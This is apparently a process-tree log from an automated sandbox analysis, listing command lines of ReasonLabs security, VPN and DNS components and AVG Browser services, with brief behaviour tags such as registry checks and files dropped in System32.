C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --standard-schemes=mc --secure-schemes=mc --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --app-user-model-id=com.reasonlabs.epp --app-path="C:\Program Files\ReasonLabs\Common\Client\v1.4.2\resources\app.asar" --enable-sandbox --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3412 --field-trial-handle=2484,i,1707590230716067083,9506986509640931280,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:14⤵PID:10768
-
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2588 --field-trial-handle=2484,i,1707590230716067083,9506986509640931280,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:24⤵PID:11352
-
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --standard-schemes=mc --secure-schemes=mc --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --app-user-model-id=com.reasonlabs.epp --app-path="C:\Program Files\ReasonLabs\Common\Client\v1.4.2\resources\app.asar" --enable-sandbox --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=1432 --field-trial-handle=2484,i,1707590230716067083,9506986509640931280,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:14⤵PID:11908
-
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --standard-schemes=mc --secure-schemes=mc --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --app-user-model-id=com.reasonlabs.epp --app-path="C:\Program Files\ReasonLabs\Common\Client\v1.4.2\resources\app.asar" --enable-sandbox --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4164 --field-trial-handle=2484,i,1707590230716067083,9506986509640931280,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:14⤵PID:9368
-
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --standard-schemes=mc --secure-schemes=mc --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --app-user-model-id=com.reasonlabs.epp --app-path="C:\Program Files\ReasonLabs\Common\Client\v1.4.2\resources\app.asar" --enable-sandbox --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4380 --field-trial-handle=2484,i,1707590230716067083,9506986509640931280,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:14⤵PID:12692
-
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --standard-schemes=mc --secure-schemes=mc --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --app-user-model-id=com.reasonlabs.epp --app-path="C:\Program Files\ReasonLabs\Common\Client\v1.4.2\resources\app.asar" --enable-sandbox --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4600 --field-trial-handle=2484,i,1707590230716067083,9506986509640931280,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:14⤵PID:13104
-
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --standard-schemes=mc --secure-schemes=mc --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --app-user-model-id=com.reasonlabs.epp --app-path="C:\Program Files\ReasonLabs\Common\Client\v1.4.2\resources\app.asar" --enable-sandbox --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4772 --field-trial-handle=2484,i,1707590230716067083,9506986509640931280,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:14⤵PID:13000
-
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --standard-schemes=mc --secure-schemes=mc --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --app-user-model-id=com.reasonlabs.epp --app-path="C:\Program Files\ReasonLabs\Common\Client\v1.4.2\resources\app.asar" --enable-sandbox --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4404 --field-trial-handle=2484,i,1707590230716067083,9506986509640931280,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:14⤵
- Checks computer location settings
PID:5112
-
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --standard-schemes=mc --secure-schemes=mc --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --app-user-model-id=com.reasonlabs.epp --app-path="C:\Program Files\ReasonLabs\Common\Client\v1.4.2\resources\app.asar" --enable-sandbox --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3964 --field-trial-handle=2484,i,1707590230716067083,9506986509640931280,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:14⤵PID:6696
-
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --standard-schemes=mc --secure-schemes=mc --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --app-user-model-id=com.reasonlabs.epp --app-path="C:\Program Files\ReasonLabs\Common\Client\v1.4.2\resources\app.asar" --enable-sandbox --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4132 --field-trial-handle=2484,i,1707590230716067083,9506986509640931280,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:14⤵PID:7060
-
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --standard-schemes=mc --secure-schemes=mc --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --app-user-model-id=com.reasonlabs.epp --app-path="C:\Program Files\ReasonLabs\Common\Client\v1.4.2\resources\app.asar" --enable-sandbox --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5160 --field-trial-handle=2484,i,1707590230716067083,9506986509640931280,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:14⤵PID:7920
-
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --standard-schemes=mc --secure-schemes=mc --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --app-user-model-id=com.reasonlabs.epp --app-path="C:\Program Files\ReasonLabs\Common\Client\v1.4.2\resources\app.asar" --enable-sandbox --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5364 --field-trial-handle=2484,i,1707590230716067083,9506986509640931280,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:14⤵PID:7636
-
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --standard-schemes=mc --secure-schemes=mc --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --app-user-model-id=com.reasonlabs.epp --app-path="C:\Program Files\ReasonLabs\Common\Client\v1.4.2\resources\app.asar" --enable-sandbox --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=4412 --field-trial-handle=2484,i,1707590230716067083,9506986509640931280,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:14⤵PID:12128
-
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --standard-schemes=mc --secure-schemes=mc --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --app-user-model-id=com.reasonlabs.epp --app-path="C:\Program Files\ReasonLabs\Common\Client\v1.4.2\resources\app.asar" --enable-sandbox --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=4060 --field-trial-handle=2484,i,1707590230716067083,9506986509640931280,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:14⤵PID:4504
-
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --standard-schemes=mc --secure-schemes=mc --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --app-user-model-id=com.reasonlabs.epp --app-path="C:\Program Files\ReasonLabs\Common\Client\v1.4.2\resources\app.asar" --enable-sandbox --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=5060 --field-trial-handle=2484,i,1707590230716067083,9506986509640931280,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:14⤵PID:5008
-
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --standard-schemes=mc --secure-schemes=mc --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --app-user-model-id=com.reasonlabs.epp --app-path="C:\Program Files\ReasonLabs\Common\Client\v1.4.2\resources\app.asar" --enable-sandbox --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=5600 --field-trial-handle=2484,i,1707590230716067083,9506986509640931280,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:14⤵
- Checks computer location settings
PID:5616
-
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --standard-schemes=mc --secure-schemes=mc --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --app-user-model-id=com.reasonlabs.epp --app-path="C:\Program Files\ReasonLabs\Common\Client\v1.4.2\resources\app.asar" --enable-sandbox --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=4664 --field-trial-handle=2484,i,1707590230716067083,9506986509640931280,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:14⤵PID:12340
-
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --standard-schemes=mc --secure-schemes=mc --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --app-user-model-id=com.reasonlabs.epp --app-path="C:\Program Files\ReasonLabs\Common\Client\v1.4.2\resources\app.asar" --enable-sandbox --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=5080 --field-trial-handle=2484,i,1707590230716067083,9506986509640931280,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:14⤵PID:3668
-
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --standard-schemes=mc --secure-schemes=mc --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --app-user-model-id=com.reasonlabs.epp --app-path="C:\Program Files\ReasonLabs\Common\Client\v1.4.2\resources\app.asar" --enable-sandbox --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=4092 --field-trial-handle=2484,i,1707590230716067083,9506986509640931280,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:14⤵PID:10420
-
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --standard-schemes=mc --secure-schemes=mc --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --app-user-model-id=com.reasonlabs.epp --app-path="C:\Program Files\ReasonLabs\Common\Client\v1.4.2\resources\app.asar" --enable-sandbox --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=4032 --field-trial-handle=2484,i,1707590230716067083,9506986509640931280,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:14⤵PID:7192
-
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --standard-schemes=mc --secure-schemes=mc --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --app-user-model-id=com.reasonlabs.epp --app-path="C:\Program Files\ReasonLabs\Common\Client\v1.4.2\resources\app.asar" --enable-sandbox --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=4148 --field-trial-handle=2484,i,1707590230716067083,9506986509640931280,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:14⤵PID:2588
-
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --standard-schemes=mc --secure-schemes=mc --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --app-user-model-id=com.reasonlabs.epp --app-path="C:\Program Files\ReasonLabs\Common\Client\v1.4.2\resources\app.asar" --enable-sandbox --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=4808 --field-trial-handle=2484,i,1707590230716067083,9506986509640931280,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:14⤵PID:900
-
-
-
-
C:\program files\reasonlabs\epp\rsLitmus.A.exe"C:\program files\reasonlabs\epp\rsLitmus.A.exe"2⤵PID:6328
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:8400
-
-
-
C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe"C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe"1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Enumerates connected drives
- Checks system information in the registry
- Drops file in System32 directory
- Checks SCSI registry key(s)
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:10232
-
C:\Program Files\AVG\Browser\Application\124.0.25039.207\elevation_service.exe"C:\Program Files\AVG\Browser\Application\124.0.25039.207\elevation_service.exe"1⤵PID:9056
-
C:\Program Files\AVG\Browser\Application\124.0.25039.207\elevation_service.exe"C:\Program Files\AVG\Browser\Application\124.0.25039.207\elevation_service.exe"1⤵PID:9060
-
C:\Program Files\ReasonLabs\VPN\rsVPNClientSvc.exe"C:\Program Files\ReasonLabs\VPN\rsVPNClientSvc.exe"1⤵PID:9004
-
C:\Program Files\ReasonLabs\VPN\rsVPNSvc.exe"C:\Program Files\ReasonLabs\VPN\rsVPNSvc.exe"1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:11100 -
\??\c:\program files\reasonlabs\VPN\ui\VPN.exe"c:\program files\reasonlabs\VPN\ui\VPN.exe" --minimized --focused --first-run2⤵PID:10728
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" "c:\program files\reasonlabs\VPN\ui\app.asar" --engine-path="c:\program files\reasonlabs\VPN" --minimized --focused --first-run3⤵PID:10764
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\VPN" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2180 --field-trial-handle=2184,i,8563667732089340411,260272161236430548,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:24⤵PID:10120
-
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\VPN" --mojo-platform-channel-handle=3164 --field-trial-handle=2184,i,8563667732089340411,260272161236430548,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:84⤵PID:5192
-
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\VPN" --app-user-model-id=com.reasonlabs.vpn --app-path="C:\Program Files\ReasonLabs\Common\Client\v1.4.2\resources\app.asar" --enable-sandbox --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=3248 --field-trial-handle=2184,i,8563667732089340411,260272161236430548,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:14⤵PID:9476
-
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\VPN" --app-user-model-id=com.reasonlabs.vpn --app-path="C:\Program Files\ReasonLabs\Common\Client\v1.4.2\resources\app.asar" --enable-sandbox --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3612 --field-trial-handle=2184,i,8563667732089340411,260272161236430548,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:14⤵PID:9676
-
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\VPN" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1364 --field-trial-handle=2184,i,8563667732089340411,260272161236430548,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:24⤵PID:5740
-
-
-
-
C:\Program Files\AVG\Browser\Application\124.0.25039.207\elevation_service.exe"C:\Program Files\AVG\Browser\Application\124.0.25039.207\elevation_service.exe"1⤵PID:9956
-
C:\Program Files\AVG\Browser\Application\124.0.25039.207\elevation_service.exe"C:\Program Files\AVG\Browser\Application\124.0.25039.207\elevation_service.exe"1⤵PID:9584
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:7252
-
C:\Program Files\ReasonLabs\DNS\rsDNSClientSvc.exe"C:\Program Files\ReasonLabs\DNS\rsDNSClientSvc.exe"1⤵PID:12064
-
C:\Program Files\ReasonLabs\DNS\rsDNSResolver.exe"C:\Program Files\ReasonLabs\DNS\rsDNSResolver.exe"1⤵PID:12280
-
C:\Program Files\ReasonLabs\DNS\rsDNSSvc.exe"C:\Program Files\ReasonLabs\DNS\rsDNSSvc.exe"1⤵
- Modifies data under HKEY_USERS
PID:7672 -
\??\c:\program files\reasonlabs\DNS\ui\DNS.exe"c:\program files\reasonlabs\DNS\ui\DNS.exe" --minimized --focused --first-run2⤵PID:11496
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" "c:\program files\reasonlabs\DNS\ui\app.asar" --engine-path="c:\program files\reasonlabs\DNS" --minimized --focused --first-run3⤵PID:11516
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\DNS" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2124 --field-trial-handle=2128,i,17703412403185544467,13244523372060898060,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:24⤵PID:12208
-
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\DNS" --mojo-platform-channel-handle=3148 --field-trial-handle=2128,i,17703412403185544467,13244523372060898060,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:84⤵PID:9744
-
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\DNS" --app-user-model-id=com.reasonlabs.dns --app-path="C:\Program Files\ReasonLabs\Common\Client\v1.4.2\resources\app.asar" --enable-sandbox --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=3248 --field-trial-handle=2128,i,17703412403185544467,13244523372060898060,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:14⤵PID:10028
-
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\DNS" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2692 --field-trial-handle=2128,i,17703412403185544467,13244523372060898060,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:24⤵PID:11904
-
-
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:11612
-
